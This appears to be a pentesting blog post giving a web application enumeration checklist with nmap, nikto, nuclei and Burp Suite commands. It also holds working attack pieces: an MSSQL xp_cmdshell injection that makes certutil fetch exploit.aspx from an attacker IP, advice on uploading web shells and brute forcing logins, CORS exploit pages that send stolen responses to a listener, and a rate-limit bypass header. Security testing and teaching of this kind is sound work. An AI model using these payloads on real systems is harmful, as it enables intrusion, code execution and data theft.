Hello Minna-san, this post covers some basic Checks to be carried out while Penetration Testing web application, though it doesn't cover the exploitation part yet.
Simple Web Page Enum Checklist
- Scan All the Ports via Nmap
- Web Servers can be Found on any port
- nmap -Pn -p- 10.10.10.10
- Check robots.txt
- Run nikto, dirb, dirsearch.py --> check large dictionaries
- nikto -h 10.10.10.10
- dirb http://10.10.10.10
- dirsearch.py -u http://10.10.10.10 -e *
- CUPP -i
- Try to use all kinds of HTTP methods - GET,POST, PUT
- Try with curl -X put --upload-file <filename> <web server address>
- Check for login pages, if found any - try to login with default creds. Send it to burp intruder/Turbo Intruder and brute force it
- Check the CMS of the Application
- if its wordpress/ Drupal/ joomla run their specific scanners - wpscan, drupscan
- Try to login with default credentials - Use intruder / wpscan
- search for vulnerable plugins
- use CEWL to generate a list of passwords/usernames and emails
- Check if the CMS version has any existing Vulnerabilities
- Intercept the request and see what's going on in the backend
- In case, if you are able to login but do not have access to write in any of the page, upload a vulnerable plugin and exploit it
- After Authentication: if the OS is unknown, go to "TEMPLATE EDITOR" --> try uploading different kinds of shells --> php, PHP4, PHP5, php.png
- Run sqlmap, w3af or any automated scanning on the application
- Check the webserver information using whatweb
- whatweb 10.10.10.10
- whatweb 10.10.10.0/16 --no-errors | grep -v Unassigned
- Check the HTTP Response headers, you might see the application server information or the proxy information
- Authenticated: Check for file uploads or any input fields
Finding Vulnerabilities using Tools
Sn1per
Sn1per -t 10.10.10.10 -m vulnscan
Sn1per -t 10.10.10.10 -m webscan
NucleiTemplates list: cves,vulnerabilities,exposed-panels,takeovers,exposures,technologies,misconfiguration,workflows,miscellaneous,default-logins,file,dns,fuzzing,helpers,iot,
#Update the templates
nuclei -update-templates
#Scan the taget using given templates
nuclei -t cves 10.10.10.10
#scan cves based on Severity
nuclei -t cves/ -severity critical -l <target-list>
#Scan all templates except a few
nuclei -l <target-list> -t nuclei-templates/ -exclude iot/ -exclude technologies
#Run automated authenticated scan with a given list of templates
nuclei -u https://domain/ -as -t cves,vulnerabilities,exposed-panels,takeovers,exposures,technologies,misconfiguration,workflows,miscellaneous,default-logins,file,dns,fuzzing,iot -H "Authorization: Bearer sdasdsada"
Nikto
nikto -h 10.10.10.10
nikto -h 10.10.10.10 -ssl
Joomla CMS
git clone https://github.com/rezasp/joomscan.git
cd joomscan
perl joomscan.pl -u www.example.com --ec
If its a windows operating system and if you think there might be an sql injection, then database is MSSQL - You can try this exploit.
';EXEC xp_cmdshell 'any windows command'
';EXEC xp_cmdshell 'certutil -urlcatche -f http://IP_address/exploit.aspx';--
//In case you dont have enough privileges , try the beko
EXEC sp_configure 'show advanced options', 1; RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;
#Validating Webpages from Multiple IPs
nmap -Pn -p443 10.10.103.0/24 --open -oG https
grep ' 443/open/' https | cut -d' ' -f 2 | sort -uV > 443.txt
for i in $(cat 443.txt); do (wget https://$i --no-check-certificate --tries=1 -O $i) & done
for i in $(seq 1 255); do (curl -s -I -vv https://10.10.10.$i --connect-timeout 2) done | tee 443
for i in $(seq 1 255); do (wget https://10.10.10.$i -t 1 --connect-timeout=5); done | tee wget-443
Find URL Shortnames
git clone https://github.com/bitquark/shortscan
shortscan https://domain.com/
shortscan https://domain.com/admin/
shortscan https://domain.com/test/
Check for AEM Vulns
git clone https://github.com/0ang3el/aem-hacker.git
#scan AEM webapp for vulnerabilities.
python3 aem_hacker.py -u https://aem.webapp --host SSRF_TestServer_IP
#scan urls and find AEM webapps among them.
python3 aem_discoverer.py --file urls.txt --workers 150
More available on Github
HTTP Verb Tampering
#!/bin/bash
for webservmethod in GET POST PUT TRACE CONNECT OPTIONS PROPFIND;
do
printf "$webservmethod " ;
printf "$webservmethod / HTTP/1.1\nHost: $1\n\n" | nc -q 1 $1 80 | grep "HTTP/1.1"
done
#Nikto for i in $(cat ips.txt); do (nikto -h $i -o $i -Format txt) & done #SSLScan
Burp Suite Tips
- look for parameters (sitemap --> filter by parameter)
- Look for hideen fields. (proxy --> options --> Response modifications --> "unhide hidden form fields")
- Check Host Header injection
- Check for CORS
Session handling with anti-csrf token:
capture the req -->
project options --> Sessions -->Macros --> Add --> Select the url from HTTP history --> hit "Configure this item' --> Under "Custom Parameter locations in response" click "Add" --> find the anti-csrf token from the page reponse under the dialogue box and select it; it should automatically update the expression --> name the parameter (Exactly same as the anto-csrf parameter) and click "ok" --> "Test macro" --> macro is now saved
Session handling Rules --> 'Add' a new rule --> "name" the rule --> under Rule Actions click 'Add' --> Select "Run a macro" --> select the macro that we created earlier. --> select "Update only the following parameters" & type the anticsrf parameter name that you are looking to update everytime; Click edit; enter the param name --> add --> close --> ok --> ok; you should see the new rule under session handling rules
*Now whenever you run the url under repeater, anti-csrf token will update automatically *
Check for CORS
Burp --> proxy --> options --> match & replace --> Add -->
Type: Request header
Match: Origin: https://domain.com
Replace: Origin: https"//untrusted.domain.com
--> ok
Check the response for 'Access-Control-Allow-Origin'; if you find the untrusted.domain.com in response --> its vulnerable to CORS
.204 No content status code --> Not Vulnerable
Exploiting CORS
create a HTTPS Server using the script
<html> <body> <script> var req = new XMLHttpRequest(); req.onload = reqListener; req.open('get','https://domain.com/CORS/issue',true); req.withCredentials = true; req.setRequestHeader('Origin','https://localhost') req.setRequestHeader('Cookie', 'user-token=COOKIE_VALUE'); req.setRequestHeader('Access-Control-Request-Headers', 'content-type,x-requested-with'); req.send().
function reqListener() { location='https://localhost/log?key='+this.responseText; };
</script> <body></html>
<html> <head></head> <body> <script> var xhr = new XMLHttpRequest(); xhr.onreadystatechange = function() { if (this.readyState == 4 && this.status == 200) { var xhr2 = new XMLHttpRequest(); // attacker.server: attacker listener to steal response xhr2.open("POST", "https://localhost", true); xhr2.send(xhr.responseText); } }; // victim.site: vulnerable server with `Access-Control-Allow-Origin: *` header xhr.open("GET", "https://domain.com/asdsa", false); xhr.withCredentials = true; xhr.setRequestHeader('Origin','https://localhost') xhr.setRequestHeader('Cookie', 'user-token='); xhr.setRequestHeader('Access-Control-Request-Headers', 'content-type,x-requested-with'); xhr.send(); </script> </body></html>
Tips:
-look for parameters (sitemap --> filter by parameter)
- Look for hideen fields. (proxy --> options --> Response modifications --> "unhide hidden form fields")
- Check for CORS origin (create a spoofed CORS using proxy --> options --> match & replace --> add 'Origin:' test.pentest.com)
- Try Injection on all Headers
- Send anticsrf tokens to sequencer
- Compare Site-maps for ACL's (Using Compare Sitemaps feature)
- Set burp proxy in ZAP outgoing proxy to view the OWASP ZAP data
Techniques:
Bypass Rate Limit: Add "X-Forwarded-For: 127.0.0.1" header in the request
You can also refer to This page covered most of the web attacks - Newbie pentest
Comments
Post a Comment